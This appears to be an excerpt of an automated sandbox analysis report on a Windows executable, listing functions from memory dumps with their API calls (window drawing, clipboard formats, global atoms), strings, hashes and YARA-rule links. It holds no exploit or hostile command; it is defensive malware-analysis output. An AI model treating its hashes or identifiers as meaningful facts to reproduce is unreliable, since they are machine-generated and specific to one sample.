                                      Function 004234B8, Relevance: .2, Instructions: 232COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1326dbfe937a3d52607a40f3223747c6343d9964fca09c179b077a83c12a3909
                                      • Instruction ID: bc2db7187c427a76b8ab62e3ea554765f84cf069239f3f8b23c43390bb69995f
                                      • Opcode Fuzzy Hash: 1326dbfe937a3d52607a40f3223747c6343d9964fca09c179b077a83c12a3909
                                      • Instruction Fuzzy Hash: A0C1B674A04229DBCB19CF29D990AEDBBB1BF88304F5481DAD84DA7345D734AA81CF48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00423A87, Relevance: .2, Instructions: 221COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d28601e97a7366d3c4e9cdd0175e350a10ebb45b43f3f05574ef68178ebad36
                                      • Instruction ID: 8decf331596c51c175b0e078763d02ecb03c7d88d170dade55c1e1d7d67e8e98
                                      • Opcode Fuzzy Hash: 3d28601e97a7366d3c4e9cdd0175e350a10ebb45b43f3f05574ef68178ebad36
                                      • Instruction Fuzzy Hash: 88B1C474A04229CFCB58CF29D890AEDBBB2BF88305F5482E9D44DA7345D734AA81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00423C50, Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca49d15793440a6ac7f647823fe6feca71106282b6619b30b4752bfb79efa4ab
                                      • Instruction ID: 3adbb1fa125a820f2e50b802067d28d3303e3427a5e264c59da25ce0a8c7dbd3
                                      • Opcode Fuzzy Hash: ca49d15793440a6ac7f647823fe6feca71106282b6619b30b4752bfb79efa4ab
                                      • Instruction Fuzzy Hash: 2FB19374A081298FCB58CF69D994AEDBBF2AF88304F9482D9D44DA7345D734AE81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00424075, Relevance: .2, Instructions: 191COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ff7f7632a3d7463b3c42bda7d453b67425c52ac1cad7b5b975fe67536b850dc
                                      • Instruction ID: b6745542e3b72dc6fa85fdce590e681673158f25692b35a167deaa880b2b1764
                                      • Opcode Fuzzy Hash: 4ff7f7632a3d7463b3c42bda7d453b67425c52ac1cad7b5b975fe67536b850dc
                                      • Instruction Fuzzy Hash: E0A19574A082298FDB58CF28D994AEABBF1FF88304F9482D9D54DA7345D7349A81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045DA88, Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
                                      • Instruction ID: ec5f160aa7d3ff319a5d9b1e4398db9f83ccbe75ed93f38eb7494662ccf87ff1
                                      • Opcode Fuzzy Hash: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
                                      • Instruction Fuzzy Hash: D511D7B6D00208EFCB14DF94D9819AEB7B5BF48301F1445AAD805A7342E734AF49CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045DB28, Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                      • Instruction ID: 4e66783db4aab46e1a67f9a6e7790c03a1e7b81099787a59bb9d8eee4baffeb4
                                      • Opcode Fuzzy Hash: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                      • Instruction Fuzzy Hash: D01116B6D00208EFCB14DF94D8819AEB3B5BF48301F6445AAD815A7342E734AF48CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045DA58, Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                      • Instruction ID: 77d9a9fb65cb97d3c038e7a52c9602304c00cae3818c77ba78c371bfac5425de
                                      • Opcode Fuzzy Hash: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                      • Instruction Fuzzy Hash: 79B00239661540CFCA55CF08C194E00F3F4FB58760B068491EC05CB722C234ED40CA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045DA68, Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                      • Instruction ID: 08eb0ad0d3f855e474f3ff173f69043067d91ea7c285dfdd00ec0894cc9890fd
                                      • Opcode Fuzzy Hash: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                      • Instruction Fuzzy Hash: ABB00279661550CFCA51CB08C294E10F3F4FB48770B068591EC09CB722C234ED40CA01
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045DDF8, Relevance: .0, Instructions: 3COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                      • Instruction ID: 09a661d3bcde169e3a68bda8983e2d082d1c510c2daa6ab026a58b72df35bac7
                                      • Opcode Fuzzy Hash: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                      • Instruction Fuzzy Hash: 3AA00235692980CFCE16CF08C290F0073B4F754B40F010490E401C7A21C228ED40C940
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004420F0, Relevance: 55.9, APIs: 37, Instructions: 426windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32 ref: 00442104
                                      • GetParent.USER32(?), ref: 0044211D
                                      • SetBkMode.GDI32(?,00000002), ref: 0044212D
                                      • GetClientRect.USER32 ref: 0044213F
                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00442167
                                      • SelectObject.GDI32(?,00000000), ref: 00442177
                                        • Part of subcall function 00441DB0: InflateRect.USER32(?,000000FF,000000FF), ref: 00441DF2
                                        • Part of subcall function 00441DB0: IsWindowEnabled.USER32(?), ref: 00441E05
                                        • Part of subcall function 00441DB0: InflateRect.USER32(?,000000FF,000000FF), ref: 00441E2C
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E43
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E5C
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E74
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E8E
                                        • Part of subcall function 00441DB0: SelectObject.GDI32(?,00000000), ref: 00441EB3
                                      • GetSysColor.USER32(0000000F), ref: 00442189
                                      • SetBkColor.GDI32(?,00000000), ref: 0044218D
                                      • GetSysColor.USER32(00000012), ref: 00442195
                                      • SetTextColor.GDI32(?,00000000), ref: 00442199
                                      • SendMessageA.USER32(?,00000135,?,?), ref: 004421AB
                                      • SelectObject.GDI32(?,00000000), ref: 004421B3
                                      • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004421D8
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00442210
                                      • IsWindowEnabled.USER32(?), ref: 00442217
                                      • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0044222B
                                      • GetWindowTextA.USER32 ref: 00442299
                                      • SelectObject.GDI32(?,?), ref: 004425EF
                                      • SelectObject.GDI32(?,00000000), ref: 00442602
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                                      • String ID:
                                      • API String ID: 2549663215-0
                                      • Opcode ID: 1682405747360eabe9c31218b8c019574581da7f0eca5db70f202929f512fefe
                                      • Instruction ID: bdf2ffbef5f0773818fe3746d8b2bc19e29757fe273e2a6d1cfff4775e6ae4eb
                                      • Opcode Fuzzy Hash: 1682405747360eabe9c31218b8c019574581da7f0eca5db70f202929f512fefe
                                      • Instruction Fuzzy Hash: 05F149B1108301AFE310DF64CD85B6BB7F8FB89705F40492EF68582291D7B9E945CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442920, Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 263windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32 ref: 0044292E
                                      • SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0044295A
                                      • HideCaret.USER32(?), ref: 00442970
                                      • GetWindowRect.USER32 ref: 0044297C
                                      • GetParent.USER32(?), ref: 00442983
                                      • ScreenToClient.USER32 ref: 00442997
                                      • ScreenToClient.USER32 ref: 004429A3
                                      • GetDC.USER32(00000000), ref: 004429A6
                                      • GetWindowLongA.USER32 ref: 004429D8
                                      • SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 00442A05
                                      • SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 00442A26
                                      • GetClassNameA.USER32(00000000,?,00000010), ref: 00442A38
                                      • lstrcmpA.KERNEL32(?,ComboBox), ref: 00442A48
                                      • GetParent.USER32(00000000), ref: 00442A6C
                                      • MapWindowPoints.USER32 ref: 00442A83
                                      • ReleaseDC.USER32 ref: 00442A8B
                                      • GetDC.USER32(?), ref: 00442A96
                                      • GetWindowLongA.USER32 ref: 00442AAC
                                      • GetWindow.USER32(00000000,00000005), ref: 00442AC7
                                      • GetWindowRect.USER32 ref: 00442AD3
                                      • SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 00442B10
                                      • ReleaseDC.USER32 ref: 00442B20
                                      • ShowCaret.USER32(?), ref: 00442B27
                                      • GetSystemMetrics.USER32 ref: 00442B68
                                      • GetSystemMetrics.USER32 ref: 00442BC7
                                      • GetSystemMetrics.USER32 ref: 00442C18
                                      • ReleaseDC.USER32 ref: 00442C3A
                                      • ShowCaret.USER32(?), ref: 00442C48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
                                      • String ID: ComboBox
                                      • API String ID: 930961256-1152790111
                                      • Opcode ID: 073be63b8b0cb3fd6d20c407da055cb527acd97b1a9206dde0f1db87d5088ea9
                                      • Instruction ID: c8bd1cc7c7a01407a8b7df43501762d8674bb1d9ccfdae8663ddd83282f04778
                                      • Opcode Fuzzy Hash: 073be63b8b0cb3fd6d20c407da055cb527acd97b1a9206dde0f1db87d5088ea9
                                      • Instruction Fuzzy Hash: CE919371508301AFE3109F64CD89F6F77E8FB85719F40092EF641962A2D7B8E905CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441030, Relevance: 45.6, APIs: 18, Strings: 8, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00472D20,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 0044103B
                                      • GetDC.USER32(00000000), ref: 00441043
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00441054
                                      • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0044105B
                                      • GetSystemMetrics.USER32 ref: 00441079
                                      • GetSystemMetrics.USER32 ref: 00441084
                                      • ReleaseDC.USER32 ref: 0044109A
                                      • GlobalAddAtomA.KERNEL32 ref: 004410B4
                                      • LeaveCriticalSection.KERNEL32(00472D20,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 004410D0
                                      • GlobalAddAtomA.KERNEL32 ref: 004410E7
                                      • GlobalAddAtomA.KERNEL32 ref: 004410F9
                                      • GlobalAddAtomA.KERNEL32 ref: 00441106
                                      • GlobalAddAtomA.KERNEL32 ref: 0044112A
                                      • GlobalAddAtomA.KERNEL32 ref: 00441137
                                      • GlobalAddAtomA.KERNEL32 ref: 0044115B
                                      • GetSystemMetrics.USER32 ref: 0044116E
                                      • GetClassInfoA.USER32 ref: 004411B1
                                      • GetClassInfoA.USER32 ref: 004411CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                                      • String ID: @&D$C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                                      • API String ID: 1233821986-4162291837
                                      • Opcode ID: 29aaeae25fafa6a0cf007edfdcb9944ec14c6b167c66b79c237adafe1946ce69
                                      • Instruction ID: c770671f82e62e801a4ddea266b5f2ac1eab46a0130f1946002667b2ebdf3cb3
                                      • Opcode Fuzzy Hash: 29aaeae25fafa6a0cf007edfdcb9944ec14c6b167c66b79c237adafe1946ce69
                                      • Instruction Fuzzy Hash: B741C7746403809BF734AB64ED41B6637E4EB44352F100037ED48976B1EBF898C58BAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D8AC, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47registryclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8CA
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8D3
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8DD
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8E7
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8F1
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8FB
                                      • RegisterClipboardFormatA.USER32 ref: 0044D905
                                      • RegisterClipboardFormatA.USER32 ref: 0044D90F
                                      • RegisterClipboardFormatA.USER32 ref: 0044D919
                                      • RegisterClipboardFormatA.USER32 ref: 0044D923
                                      • RegisterClipboardFormatA.USER32 ref: 0044D92D
                                      • RegisterClipboardFormatA.USER32 ref: 0044D937
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClipboardFormatRegister
                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                      • API String ID: 1228543026-2889995556
                                      • Opcode ID: 1d48c113961a9791580dc5368ea021b3a1b633a4b72cc2bd17d84cd11451c38c
                                      • Instruction ID: 3809d7f04c7150e7ce7feeda2d699c90ec93e99e1a5d6bea04fd8635611c4a72
                                      • Opcode Fuzzy Hash: 1d48c113961a9791580dc5368ea021b3a1b633a4b72cc2bd17d84cd11451c38c
                                      • Instruction Fuzzy Hash: 91016770E407449A8770BF769C0991BBEE4EEC4B113224D2FE09697651E6B8E401CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441DB0, Relevance: 37.8, APIs: 25, Instructions: 294windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004402C0: SetBkColor.GDI32(?), ref: 004402DD
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0044032A
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00440359
                                        • Part of subcall function 004402C0: SetBkColor.GDI32(?,?), ref: 00440377
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403A2
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403DC
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441DF2
                                      • IsWindowEnabled.USER32(?), ref: 00441E05
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441E2C
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E43
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E5C
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E74
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E8E
                                      • SelectObject.GDI32(?,00000000), ref: 00441EB3
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00441ED7
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00441EF7
                                      • SelectObject.GDI32(?,00000000), ref: 00441F0D
                                      • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 00441F3B
                                      • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 00441F5C
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441F72
                                      • SelectObject.GDI32(?,00000000), ref: 00441F8C
                                      • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00441FB4
                                      • IsWindowEnabled.USER32(?), ref: 00441FBF
                                      • SetTextColor.GDI32(?,00000000), ref: 00441FD0
                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044205C
                                        • Part of subcall function 004402C0: SetBkColor.GDI32(?,00000000), ref: 004403E4
                                      • DrawTextA.USER32(?,?,?,?,00000020), ref: 00442094
                                      • GetFocus.USER32 ref: 004420A0
                                      • InflateRect.USER32(?,00000001,00000001), ref: 004420B1
                                      • IntersectRect.USER32 ref: 004420C2
                                      • DrawFocusRect.USER32 ref: 004420CE
                                      • SelectObject.GDI32(?,00000000), ref: 004420E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                                      • String ID:
                                      • API String ID: 1611134597-0
